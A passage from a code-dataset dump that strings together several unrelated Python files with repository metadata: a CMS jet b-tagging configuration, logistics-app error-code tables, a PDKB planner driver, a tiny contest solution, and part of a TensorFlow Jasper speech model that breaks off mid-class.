akPuSoftDrop6CaloSoftPFMuonBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonBJetTags
akPuSoftDrop6CaloSoftPFMuonByIP3dBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonByIP3dBJetTags
akPuSoftDrop6CaloSoftPFMuonByPtBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonByPtBJetTags
akPuSoftDrop6CaloNegativeSoftPFMuonByPtBJetTags = akPuSoftDrop6CalobTagger.NegativeSoftPFMuonByPtBJetTags
akPuSoftDrop6CaloPositiveSoftPFMuonByPtBJetTags = akPuSoftDrop6CalobTagger.PositiveSoftPFMuonByPtBJetTags
akPuSoftDrop6CaloPatJetFlavourIdLegacy = cms.Sequence(akPuSoftDrop6CaloPatJetPartonAssociationLegacy*akPuSoftDrop6CaloPatJetFlavourAssociationLegacy)
#Not working with our PU sub, but keep it here for reference
#akPuSoftDrop6CaloPatJetFlavourAssociation = akPuSoftDrop6CalobTagger.PatJetFlavourAssociation
#akPuSoftDrop6CaloPatJetFlavourId = cms.Sequence(akPuSoftDrop6CaloPatJetPartons*akPuSoftDrop6CaloPatJetFlavourAssociation)
akPuSoftDrop6CaloJetBtaggingIP = cms.Sequence(akPuSoftDrop6CaloImpactParameterTagInfos *
(akPuSoftDrop6CaloTrackCountingHighEffBJetTags +
akPuSoftDrop6CaloTrackCountingHighPurBJetTags +
akPuSoftDrop6CaloJetProbabilityBJetTags +
akPuSoftDrop6CaloJetBProbabilityBJetTags
)
)
akPuSoftDrop6CaloJetBtaggingSV = cms.Sequence(akPuSoftDrop6CaloImpactParameterTagInfos
*
akPuSoftDrop6CaloSecondaryVertexTagInfos
* (akPuSoftDrop6CaloSimpleSecondaryVertexHighEffBJetTags+
akPuSoftDrop6CaloSimpleSecondaryVertexHighPurBJetTags+
akPuSoftDrop6CaloCombinedSecondaryVertexBJetTags+
akPuSoftDrop6CaloCombinedSecondaryVertexV2BJetTags
)
)
akPuSoftDrop6CaloJetBtaggingNegSV = cms.Sequence(akPuSoftDrop6CaloImpactParameterTagInfos
*
akPuSoftDrop6CaloSecondaryVertexNegativeTagInfos
* (akPuSoftDrop6CaloNegativeSimpleSecondaryVertexHighEffBJetTags+
akPuSoftDrop6CaloNegativeSimpleSecondaryVertexHighPurBJetTags+
akPuSoftDrop6CaloNegativeCombinedSecondaryVertexBJetTags+
akPuSoftDrop6CaloPositiveCombinedSecondaryVertexBJetTags+
akPuSoftDrop6CaloNegativeCombinedSecondaryVertexV2BJetTags+
akPuSoftDrop6CaloPositiveCombinedSecondaryVertexV2BJetTags
)
)
akPuSoftDrop6CaloJetBtaggingMu = cms.Sequence(akPuSoftDrop6CaloSoftPFMuonsTagInfos * (akPuSoftDrop6CaloSoftPFMuonBJetTags
+
akPuSoftDrop6CaloSoftPFMuonByIP3dBJetTags
+
akPuSoftDrop6CaloSoftPFMuonByPtBJetTags
+
akPuSoftDrop6CaloNegativeSoftPFMuonByPtBJetTags
+
akPuSoftDrop6CaloPositiveSoftPFMuonByPtBJetTags
)
)
akPuSoftDrop6CaloJetBtagging = cms.Sequence(akPuSoftDrop6CaloJetBtaggingIP
*akPuSoftDrop6CaloJetBtaggingSV
*akPuSoftDrop6CaloJetBtaggingNegSV
# *akPuSoftDrop6CaloJetBtaggingMu
)
akPuSoftDrop6CalopatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("akPuSoftDrop6CaloJets"),
genJetMatch = cms.InputTag("akPuSoftDrop6Calomatch"),
genPartonMatch = cms.InputTag("akPuSoftDrop6Caloparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akPuSoftDrop6Calocorr")),
JetPartonMapSource = cms.InputTag("akPuSoftDrop6CaloPatJetFlavourAssociationLegacy"),
JetFlavourInfoSource = cms.InputTag("akPuSoftDrop6CaloPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("akPuSoftDrop6CaloJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = True,
discriminatorSources = cms.VInputTag(cms.InputTag("akPuSoftDrop6CaloSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("akPuSoftDrop6CaloSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("akPuSoftDrop6CaloCombinedSecondaryVertexBJetTags"),
cms.InputTag("akPuSoftDrop6CaloCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("akPuSoftDrop6CaloJetBProbabilityBJetTags"),
cms.InputTag("akPuSoftDrop6CaloJetProbabilityBJetTags"),
#cms.InputTag("akPuSoftDrop6CaloSoftPFMuonByPtBJetTags"),
#cms.InputTag("akPuSoftDrop6CaloSoftPFMuonByIP3dBJetTags"),
cms.InputTag("akPuSoftDrop6CaloTrackCountingHighEffBJetTags"),
cms.InputTag("akPuSoftDrop6CaloTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("akPuSoftDrop6CaloJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = True,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
# embedCaloTowers = False,
# embedPFCandidates = True
)
akPuSoftDrop6CaloNjettiness = Njettiness.clone(
src = cms.InputTag("akPuSoftDrop6CaloJets"),
R0 = cms.double( 0.6)
)
akPuSoftDrop6CalopatJetsWithBtagging.userData.userFloats.src += ['akPuSoftDrop6CaloNjettiness:tau1','akPuSoftDrop6CaloNjettiness:tau2','akPuSoftDrop6CaloNjettiness:tau3']
akPuSoftDrop6CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akPuSoftDrop6CalopatJetsWithBtagging"),
genjetTag = 'ak6HiGenJets',
rParam = 0.6,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlowTmp'),
trackTag = cms.InputTag("hiGeneralTracks"),
fillGenJets = True,
isMC = True,
doSubEvent = True,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("akPuSoftDrop6Calo"),
jetName = cms.untracked.string("akPuSoftDrop6Calo"),
genPtMin = cms.untracked.double(5),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL'),
doTower = cms.untracked.bool(True),
doSubJets = cms.untracked.bool(True),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("akSoftDrop6GenJets"),
doGenTaus = True
)
akPuSoftDrop6CaloJetSequence_mc = cms.Sequence(
#akPuSoftDrop6Caloclean
#*
akPuSoftDrop6Calomatch
#*
#akPuSoftDrop6CalomatchGroomed
*
akPuSoftDrop6Caloparton
*
akPuSoftDrop6Calocorr
*
#akPuSoftDrop6CaloJetID
#*
akPuSoftDrop6CaloPatJetFlavourIdLegacy
#*
#akPuSoftDrop6CaloPatJetFlavourId # Use legacy algo till PU implemented
*
akPuSoftDrop6CaloJetTracksAssociatorAtVertex
*
akPuSoftDrop6CaloJetBtagging
*
akPuSoftDrop6CaloNjettiness
*
akPuSoftDrop6CalopatJetsWithBtagging
*
akPuSoftDrop6CaloJetAnalyzer
)
akPuSoftDrop6CaloJetSequence_data = cms.Sequence(akPuSoftDrop6Calocorr
*
#akPuSoftDrop6CaloJetID
#*
akPuSoftDrop6CaloJetTracksAssociatorAtVertex
*
akPuSoftDrop6CaloJetBtagging
*
akPuSoftDrop6CaloNjettiness
*
akPuSoftDrop6CalopatJetsWithBtagging
*
akPuSoftDrop6CaloJetAnalyzer
)
akPuSoftDrop6CaloJetSequence_jec = cms.Sequence(akPuSoftDrop6CaloJetSequence_mc)
akPuSoftDrop6CaloJetSequence_mb = cms.Sequence(akPuSoftDrop6CaloJetSequence_mc)
akPuSoftDrop6CaloJetSequence = cms.Sequence(akPuSoftDrop6CaloJetSequence_mb)
|
[
"rchudasa@cern.ch"
] |
rchudasa@cern.ch
|
dc42d8e89404cf9af6ce1eb141a5c7628715b53b
|
8195f2c3a3b46a3b01571bcbc33960290fce3f32
|
/biz/errors.py
|
6511688a69bf2bd05d4f59a6e320e8e807cc7c69
|
[] |
no_license
|
adoggie/camel
|
e391e5544a1602ab43257b255dd6558bcc0ee3b1
|
24b4e9b397ca68b8d4d21be7c372b8163a6ca678
|
refs/heads/master
| 2021-01-18T20:27:55.172148
| 2017-05-22T14:19:57
| 2017-05-22T14:19:57
| 86,969,529
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,050
|
py
|
#coding:utf-8
from camel.fundamental.errors import hash_object,ErrorEntry
class ErrorDefs:
__ver__ =u'1.0'
__BASE__ = 0
SUCC = ErrorEntry(0, u'成功')
class ErrorDefsDispatcher:
__ver__ = u'1.0'
__BASE__ = 10000
OK = ErrorEntry(1000, u'success成功')
DB_ERROR = ErrorEntry(1001, u'数据库错误')
LOGIN_FAIL = ErrorEntry(1002, u'登录失败')
REPEAT_TIC = ErrorEntry(1003, u'')
SERVER_ERR = ErrorEntry(1004, u'服务器错误')
REFRESH = ErrorEntry(1005, u'')
TRANS_OK = ErrorEntry(1006, u'')
TRUCK_IS_ONWAY = ErrorEntry(1007, u'车辆正在运输中')
UNKNOW_DEVICE = ErrorEntry(1008, u'未知设备,仅支持web登录')
AUTH_FAIL = ErrorEntry(1100, u'鉴权失败')
NO_TOKEN = ErrorEntry(1101, u'没有TOKEN')
NO_USER = ErrorEntry(1102, u'没有用户')
TOKEN_INVALID = ErrorEntry(1103, u'token已失效')
NO_VOUCHER = ErrorEntry(1104, u'票据获取失败')
USER_NOT_ACTIVE = ErrorEntry(1201, u'用户未激活')
RESET_PWD_FAIL = ErrorEntry(1202, u'重置密码错误')
USER_UP_ERR = ErrorEntry(1203, u'用户更新错误')
USER_NO_AUTHORIZATION = ErrorEntry(1204, u'用户无权限')
NO_DRIVER = ErrorEntry(1300, u'司机用户不存在')
NO_GROUP_STATUS = ErrorEntry(1301, u'不存在此状态组')
NO_TNUMBER = ErrorEntry(1302, u'无此订单')
INVALID_STATUS = ErrorEntry(1303, u'运单状态无效')
VALUE_ERROR = ErrorEntry(1304, u'参数值错误')
TRANS_DATA_CHANGED = ErrorEntry(1305, u'运单状态被改变')
TRANS_STATUS_CHANGE_FAIL = ErrorEntry(1306, u'运单状态改变失败')
LOCATION_NOT_IN_TRANS = ErrorEntry(1307, u'该地点不存在运单中')
TRANS_FINISHED = ErrorEntry(1308, u'运单已完成,异常上报失败')
TRANS_IS_EXIST = ErrorEntry(1309, u'运单号已存在')
PLATE_NO_TRANS = ErrorEntry(1310, u'此车牌无正在进行中的运单')
NO_LOCATION = ErrorEntry(1401, u'没有此location编码')
NOTE_EXIST = ErrorEntry(1402, u'重复添加note')
RECORD_EXIST = ErrorEntry(1403, u'重复补录操作')
TRANS_STATUS_ERROR = ErrorEntry(1404, u'运单状态错误')
DRIVER_QR_RELA_FAILED = ErrorEntry(1501, u'车牌已有司机绑定')
DRIVER_QR_CODE_INVALID = ErrorEntry(1502, u'无效的司机二维码')
DRIVER_QR_CODE_EXPIRED = ErrorEntry(1503, u'司机二维码已过期')
NO_TRUCK = ErrorEntry(1601, u'车辆不存在')
NO_QR_RS = ErrorEntry(1701, u'车辆未绑定司机')
NO_LINE = ErrorEntry(1702, u'线路不存在')
DRIVER_HAS_BOUND_PLATE = ErrorEntry(1703, u'司机已绑定车牌')
NO_CQ = ErrorEntry(1704, u'未获取到车签号')
CQ_IS_EXIST = ErrorEntry(1801, u'车签已存在')
PLATE_NO_SAME = ErrorEntry(1802, u'建立关联关系的两个运单车牌不一致')
TRANS_HAVE_LINKED = ErrorEntry(1803, u'运单已经被关联')
TIME_MATCH_ERROR = ErrorEntry(1804, u'客户端时间与服务器时间不匹配')
class ErrorDefsDriver:
__ver__ =u'1.0'
__BASE__ = 20000
OK = ErrorEntry( 1000 ,u'success成功')
DB_ERROR = ErrorEntry( 1001 ,u'服务器打了个盹')
SERVER_ERR = ErrorEntry( 1004 ,u'服务器开小差啦')
REFRESH = ErrorEntry( 1005 ,u'刷新回调')
NO_PERMIT = ErrorEntry( 1008 ,u'未获取到运单信息')
AUTH_FAIL = ErrorEntry( 1100 ,u'密码输入错误,请重新输入')
TOKEN_INVALID = ErrorEntry( 1101 ,u'您的帐号登录已过期失效,请重新登录')
NO_USER = TOKEN_INVALID
NO_DRIVER = TOKEN_INVALID
NO_USER_EXIST = ErrorEntry( 1102 ,u'该手机号未注册')
NO_DRIVER_EXIST = NO_USER_EXIST
USER_OUT = ErrorEntry( 1103 ,u'您的帐号已在其他手机登录')
USER_EXIST = ErrorEntry( 1104 ,u'该手机号已被注册')
REGISTER_ERR = ErrorEntry( 1105 ,u'网络连接失败,请检查网络')
NOT_DRIVER = ErrorEntry( 1106 ,u'请使用司机端APP注册')
PASSWD_ERR = ErrorEntry( 1107 ,u'原密码输入错误,请重新输入')
USER_NOT_ACTIVE = ErrorEntry( 1201 ,u'请修改初始密码')
NO_TNUMBER = ErrorEntry( 1302 ,u'运单不存在')
SMS_EXPIRE = ErrorEntry( 1303 ,u'验证码已过期, 请重新获取')
PARAMS_ERROR = ErrorEntry( 1304 ,u'参数类型错误')
SMS_ERROR = ErrorEntry( 1305 ,u'验证码错误,请重新输入')
SMS_SENDED = ErrorEntry( 1306 ,u'验证码已发送,请稍后再试')
TRANS_FINISHED = ErrorEntry( 1308 ,u'运单已完成,无法进行异常上报')
NO_LOCATION = ErrorEntry( 1401 ,u'没有此location编码')
DRIVER_QR_RELA_FAILED = ErrorEntry( 1501 ,u'绑定失败')
NO_TRUCK = ErrorEntry( 1601 ,u'未找到对应的车辆信息')
NO_QR_RS = ErrorEntry( 1701 ,u'未绑定车辆')
EXCEPTION_EXIST = ErrorEntry(1805, u'重复上报异常')
class ErrorDefsCarrier:
__ver__ =u'1.0'
__BASE__ = 30000
OK = ErrorEntry(1800,u'success')
SERVER_ERR = ErrorEntry(1801,u'server err!')
LOGIN_FAIL = ErrorEntry(1817,u'login fail!')
NOT_ALLOW = ErrorEntry(1803,u'not allow!')
COMMITED = ErrorEntry(1804,u'commited')
REGISTERED = ErrorEntry(1805,u'registered')
NO_USER = ErrorEntry(1806,u'no user')
METHOD_ERR = ErrorEntry(1807,u'method err!')
NO_DATA = ErrorEntry(1808,u'no data')
TEMP_TOKEN = ErrorEntry(1809,u'tmp token')
PASSWD_EXPIRE = ErrorEntry(1810,u'token expire')
DB_ERROR = ErrorEntry(1811,u'db err')
CHECKED = ErrorEntry(1812,u'已审核')
ADMIN_USER = ErrorEntry(1813,u'admin user')
NO_TOKEN = ErrorEntry(1814,u'NO TOKEN')
PASSWD_ERR = ErrorEntry(1816,u'passwd error!')
TOKEN_EXPIRE = ErrorEntry(1802,u'token expire!')
PARAMS_ERR = ErrorEntry(1818,u'params_err!')
NO_SHIPPER = ErrorEntry(1819,u'no shipper')
NO_MATCH_DATA = ErrorEntry(1820,u'no match data')
SHIPPER_NO_COMMIT = ErrorEntry(1821,u'shpper have no committed')
TRUCK_EXISTS = ErrorEntry(1822,u'truck exists')
errordefs = (ErrorDefsDispatcher,ErrorDefsCarrier,ErrorDefsDriver)
def reIndex():
for defs in errordefs:
kvs = hash_object( defs)
for k,v in kvs.items():
v.value+= defs.__BASE__
print defs,':',k,'=',v.value,v.comment
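# After reIndex() every code is shifted by its class's __BASE__, e.g.
# ErrorDefsDispatcher.OK.value == 11000, ErrorDefsDriver.OK.value == 21000 and
# ErrorDefsCarrier.OK.value == 31800. Caveat (assuming hash_object enumerates
# every attribute name): aliases such as ErrorDefsDriver.NO_USER share one
# ErrorEntry object with TOKEN_INVALID, so a shared entry is shifted once per
# alias rather than once overall.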
|
[
"24509826@qq.com"
] |
24509826@qq.com
|
4b63255fa149486950f043c7f04558b67ca41f7f
|
0c53c0a5dcd5b4a6e237fb034a9e9f544fdc7d20
|
/pdkb/planner.py
|
e1b0c18f8f7b96f634343efd4bab04a60aa3ffcc
|
[
"MIT"
] |
permissive
|
javiermtorres/pdkb-planning
|
4b379776ba42ac907c246d21a93e186c54926005
|
61a96c006b606aa051b2c7c9b5bfc9b6473d2a4d
|
refs/heads/master
| 2022-11-08T12:14:06.781734
| 2020-06-23T01:40:27
| 2020-06-23T01:40:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,599
|
py
|
import os, sys, time, pickle
from .actions import *
from .problems import *
def cleanup():
os.system('rm -f pdkb-domain.pddl')
os.system('rm -f pdkb-problem.pddl')
os.system('rm -f pdkb-plan.txt')
os.system('rm -f pdkb-plan.out')
os.system('rm -f pdkb-plan.out.err')
os.system('rm -f execution.details')
def solve(pdkbddl_file, old_planner=False):
print()
if not os.path.isdir('.problem-cache'):
os.mkdir('.problem-cache')
t_start = time.time()
print("Parsing problem...", end=' ')
sys.stdout.flush()
problem = parse_pdkbddl(pdkbddl_file)
print("done!")
print("Preprocessing problem...", end=' ')
sys.stdout.flush()
prob_hash = hash(pickle.dumps(problem))
fname = ".problem-cache/%s" % str(prob_hash)
if os.path.isfile(fname) and not os.path.isfile('.nocache'):
        with open(fname, 'rb') as f:
            problem = pickle.load(f)
print("done! (from cache)")
else:
problem.preprocess()
with open(fname, 'wb') as f:
pickle.dump(problem, f, 2)
print("done!")
print("Solving problem...", end=' ')
sys.stdout.flush()
problem.solve(old_planner)
print("done!")
print("\nTime: %f s" % (time.time() - t_start))
problem.output_solution()
print()
if __name__ == '__main__':
if len(sys.argv) < 2:
print("\nUsage: python planner.py <pdkbddl file> [--keep-files] [--old-planner]\n")
sys.exit(1)
solve(sys.argv[1], old_planner=('--old-planner' in sys.argv))
    if '--keep-files' not in sys.argv:
cleanup()
|
[
"christian.muise@gmail.com"
] |
christian.muise@gmail.com
|
ca9140c6cb8e2ed05252aa84546a0ff0c9d29e76
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02717/s558364761.py
|
f30a185b94e4feeffd2e33ec0762827493b66b18
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
x, y, z = input().split()
print(z+' '+x+' '+y)
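# Sample run: input "1 2 3" -> output "3 1 2"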
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
b15b600841eb13bf2e9d5b43e4e723ffc7e840dd
|
1b91fdcb79f8f6c1ea4713105512f68a161fe334
|
/tensorflow2/tf2cv/models/jasper.py
|
f064e3a442c085afb7af68eafd305bffce4ca588
|
[
"MIT"
] |
permissive
|
YoheiYamasaki/imgclsmob
|
fb28964eb42d5e536944d4a75e6dddaff58ce965
|
fbf1fe551a6bba763db7870ece057e5068edb984
|
refs/heads/master
| 2023-05-06T11:01:55.168785
| 2021-05-26T15:04:27
| 2021-05-26T15:04:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29,749
|
py
|
"""
Jasper/DR for ASR, implemented in TensorFlow.
Original paper: 'Jasper: An End-to-End Convolutional Neural Acoustic Model,' https://arxiv.org/abs/1904.03288.
"""
__all__ = ['Jasper', 'jasper5x3', 'jasper10x4', 'jasper10x5', 'get_jasper']
import os
import tensorflow as tf
import tensorflow.keras.layers as nn
from .common import get_activation_layer, Conv1d, BatchNorm, DualPathSequential, DualPathParallelConcurent,\
is_channels_first
def conv1d1(in_channels,
out_channels,
strides=1,
groups=1,
use_bias=False,
data_format="channels_last",
**kwargs):
"""
1-dim kernel version of the 1D convolution layer.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int, default 1
Strides of the convolution.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
return Conv1d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
groups=groups,
use_bias=use_bias,
data_format=data_format,
**kwargs)
class MaskConv1d(Conv1d):
"""
Masked 1D convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int or tuple/list of 1 int
Convolution window size.
strides : int or tuple/list of 1 int
Strides of the convolution.
padding : int or tuple/list of 1 int, default 0
Padding value for convolution layer.
dilation : int or tuple/list of 1 int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
use_mask : bool, default True
Whether to use mask.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
strides,
padding=0,
dilation=1,
groups=1,
use_bias=False,
use_mask=True,
data_format="channels_last",
**kwargs):
super(MaskConv1d, self).__init__(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
strides=strides,
padding=padding,
dilation=dilation,
groups=groups,
use_bias=use_bias,
data_format=data_format,
**kwargs)
self.use_mask = use_mask
self.data_format = data_format
if self.use_mask:
self.kernel_size = kernel_size[0] if isinstance(kernel_size, (list, tuple)) else kernel_size
self.strides = strides[0] if isinstance(strides, (list, tuple)) else strides
self.padding = padding[0] if isinstance(padding, (list, tuple)) else padding
self.dilation = dilation[0] if isinstance(dilation, (list, tuple)) else dilation
def call(self, x, x_len):
if self.use_mask:
if is_channels_first(self.data_format):
max_len = x.shape[2]
mask = tf.cast(tf.linspace(0, max_len - 1, max_len), tf.int64) < x_len[0]
mask = tf.broadcast_to(tf.expand_dims(tf.expand_dims(mask, 0), 1), x.shape)
x = tf.where(mask, x, tf.zeros(x.shape))
else:
max_len = x.shape[1]
mask = tf.cast(tf.linspace(0, max_len - 1, max_len), tf.int64) < x_len[0]
mask = tf.broadcast_to(tf.expand_dims(tf.expand_dims(mask, 0), 2), x.shape)
x = tf.where(mask, x, tf.zeros(x.shape))
x_len = (x_len + 2 * self.padding - self.dilation * (self.kernel_size - 1) - 1) // self.strides + 1
x = super(MaskConv1d, self).call(x)
return x, x_len
def mask_conv1d1(in_channels,
out_channels,
strides=1,
groups=1,
use_bias=False,
data_format="channels_last",
**kwargs):
"""
Masked 1-dim kernel version of the 1D convolution layer.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int, default 1
Strides of the convolution.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
return MaskConv1d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
groups=groups,
use_bias=use_bias,
data_format=data_format,
**kwargs)
class MaskConvBlock1d(nn.Layer):
"""
Masked 1D convolution block with batch normalization, activation, and dropout.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int
Convolution window size.
strides : int
Strides of the convolution.
padding : int
Padding value for convolution layer.
dilation : int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
use_bn : bool, default True
Whether to use BatchNorm layer.
bn_eps : float, default 1e-5
Small float added to variance in Batch norm.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
dropout_rate : float, default 0.0
        Parameter of Dropout layer. Fraction of the input units to drop.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
strides,
padding,
dilation=1,
groups=1,
use_bias=False,
use_bn=True,
bn_eps=1e-5,
activation="relu",
dropout_rate=0.0,
data_format="channels_last",
**kwargs):
super(MaskConvBlock1d, self).__init__(**kwargs)
self.activate = (activation is not None)
self.use_bn = use_bn
self.use_dropout = (dropout_rate != 0.0)
self.conv = MaskConv1d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
strides=strides,
padding=padding,
dilation=dilation,
groups=groups,
use_bias=use_bias,
data_format=data_format,
name="conv")
if self.use_bn:
self.bn = BatchNorm(
epsilon=bn_eps,
data_format=data_format,
name="bn")
if self.activate:
self.activ = get_activation_layer(activation, name="activ")
if self.use_dropout:
self.dropout = nn.Dropout(
rate=dropout_rate,
name="dropout")
def call(self, x, x_len, training=None):
x, x_len = self.conv(x, x_len)
if self.use_bn:
x = self.bn(x, training=training)
if self.activate:
x = self.activ(x)
if self.use_dropout:
x = self.dropout(x, training=training)
return x, x_len
def mask_conv1d1_block(in_channels,
out_channels,
strides=1,
padding=0,
data_format="channels_last",
**kwargs):
"""
1-dim kernel version of the masked 1D convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int, default 1
Strides of the convolution.
padding : int, default 0
Padding value for convolution layer.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
return MaskConvBlock1d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
padding=padding,
data_format=data_format,
**kwargs)
class ChannelShuffle1d(nn.Layer):
"""
1D version of the channel shuffle layer.
Parameters:
----------
channels : int
Number of channels.
groups : int
Number of groups.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
channels,
groups,
data_format="channels_last",
**kwargs):
super(ChannelShuffle1d, self).__init__(**kwargs)
assert (channels % groups == 0)
self.groups = groups
self.data_format = data_format
def call(self, x, training=None):
x_shape = x.get_shape().as_list()
if is_channels_first(self.data_format):
channels = x_shape[1]
seq_len = x_shape[2]
else:
seq_len = x_shape[1]
channels = x_shape[2]
assert (channels % self.groups == 0)
channels_per_group = channels // self.groups
if is_channels_first(self.data_format):
x = tf.reshape(x, shape=(-1, self.groups, channels_per_group, seq_len))
x = tf.transpose(x, perm=(0, 2, 1, 3))
x = tf.reshape(x, shape=(-1, channels, seq_len))
else:
x = tf.reshape(x, shape=(-1, seq_len, self.groups, channels_per_group))
x = tf.transpose(x, perm=(0, 1, 3, 2))
x = tf.reshape(x, shape=(-1, seq_len, channels))
return x
def __repr__(self):
s = "{name}(groups={groups})"
return s.format(
name=self.__class__.__name__,
groups=self.groups)
class DwsConvBlock1d(nn.Layer):
"""
Depthwise version of the 1D standard convolution block with batch normalization, activation, dropout, and channel
shuffle.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int
Convolution window size.
strides : int
Strides of the convolution.
padding : int
Padding value for convolution layer.
dilation : int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
use_bn : bool, default True
Whether to use BatchNorm layer.
bn_eps : float, default 1e-5
Small float added to variance in Batch norm.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
dropout_rate : float, default 0.0
        Parameter of Dropout layer. Fraction of the input units to drop.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
strides,
padding,
dilation=1,
groups=1,
use_bias=False,
use_bn=True,
bn_eps=1e-5,
activation="relu",
dropout_rate=0.0,
data_format="channels_last",
**kwargs):
super(DwsConvBlock1d, self).__init__(**kwargs)
self.activate = (activation is not None)
self.use_bn = use_bn
self.use_dropout = (dropout_rate != 0.0)
self.use_channel_shuffle = (groups > 1)
self.dw_conv = MaskConv1d(
in_channels=in_channels,
out_channels=in_channels,
kernel_size=kernel_size,
strides=strides,
padding=padding,
dilation=dilation,
groups=in_channels,
use_bias=use_bias,
data_format=data_format,
name="dw_conv")
self.pw_conv = mask_conv1d1(
in_channels=in_channels,
out_channels=out_channels,
groups=groups,
use_bias=use_bias,
data_format=data_format,
name="pw_conv")
if self.use_channel_shuffle:
self.shuffle = ChannelShuffle1d(
channels=out_channels,
groups=groups,
data_format=data_format,
name="shuffle")
if self.use_bn:
self.bn = BatchNorm(
epsilon=bn_eps,
data_format=data_format,
name="bn")
if self.activate:
self.activ = get_activation_layer(activation, name="activ")
if self.use_dropout:
self.dropout = nn.Dropout(
rate=dropout_rate,
name="dropout")
def call(self, x, x_len, training=None):
x, x_len = self.dw_conv(x, x_len)
x, x_len = self.pw_conv(x, x_len)
if self.use_channel_shuffle:
x = self.shuffle(x)
if self.use_bn:
x = self.bn(x, training=training)
if self.activate:
x = self.activ(x)
if self.use_dropout:
x = self.dropout(x, training=training)
return x, x_len
class JasperUnit(nn.Layer):
"""
Jasper unit with residual connection.
Parameters:
----------
in_channels : int or list of int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int
Convolution window size.
bn_eps : float
Small float added to variance in Batch norm.
dropout_rate : float
        Parameter of Dropout layer. Fraction of the input units to drop.
repeat : int
Count of body convolution blocks.
use_dw : bool
Whether to use depthwise block.
use_dr : bool
Whether to use dense residual scheme.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
bn_eps,
dropout_rate,
repeat,
use_dw,
use_dr,
data_format="channels_last",
**kwargs):
super(JasperUnit, self).__init__(**kwargs)
self.use_dropout = (dropout_rate != 0.0)
self.use_dr = use_dr
block_class = DwsConvBlock1d if use_dw else MaskConvBlock1d
if self.use_dr:
self.identity_block = DualPathParallelConcurent(name="identity_block")
for i, dense_in_channels_i in enumerate(in_channels):
self.identity_block.add(mask_conv1d1_block(
in_channels=dense_in_channels_i,
out_channels=out_channels,
bn_eps=bn_eps,
dropout_rate=0.0,
activation=None,
data_format=data_format,
name="block{}".format(i + 1)))
